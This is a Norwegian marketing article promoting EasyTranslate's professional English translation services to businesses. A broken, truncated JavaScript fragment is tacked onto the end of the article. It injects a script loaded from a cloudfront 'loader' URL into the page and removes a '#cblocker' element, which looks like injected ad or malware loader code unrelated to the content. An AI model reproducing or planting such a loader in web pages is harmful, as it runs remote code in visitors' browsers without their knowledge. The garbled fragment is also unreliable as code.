Spre budskapet ditt med engelske oversettere

Har du ofte opplevd språkbarrièrer når du har vært på reise, når du for eksempel vil spørre om veien eller handle på butikken? I disse tilfellene er det snakk om forholdsvis enkle misforståelser, som man lett kan komme seg ut av ved hjelp av enkle ord eller håndbevegelser.

 

Det er noe annerledes når arbeidet ditt skal oversettes – da kommer man ikke alltid særlig langt med forenklede ord eller gestikulering. Telefoner og e-poster utfordrer våre språklige evner, og må være solide i både lyd og skriftlig. Mange ser nok på denne utfordringen som et hinder i hverdagen, da de gjerne tilegnet seg engelskkunnskapene sine på skolen, med datidens fattige ordforråd og forståelse.

 

Hvis man ønsker å nå ut til flere enn bare de som behersker norsk, kan man rask konkludere med at formidling på engelsk er veien å gå. Engelsk er ett av verdens mest talte språk, og i forretningslivet merkes det med at flere og flere blir bedre og mer nyansert i sine engelskkunnskaper. Vil man unngå å falle på gulvet mellom bedriften og kundene, er det viktig å henge med i denne utviklingen, og å få bedriftens budskap ut til et stadig mer globalisert marked.

 

For mange kunder er det ikke aktuelt å tilegne seg disse avanserte språkkunnskapene, som avviker sterkt fra det sparsomme språket vi bruker på reise, og derfor ber dem om hjelp fra EasyTranslate. Her får du hjelp med oversettelsene dine av profesjonelle oversettere, tolker og translatører, som til og med har kjennskap til bransjen din, slik at de best skal kunne løse oppgaven.

 

Vil du også ha hjelp til oversettelsene dine? Klikk her for å få vite mer om hvordan du enkelt skaffer deg kvalifisert hjelp.

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>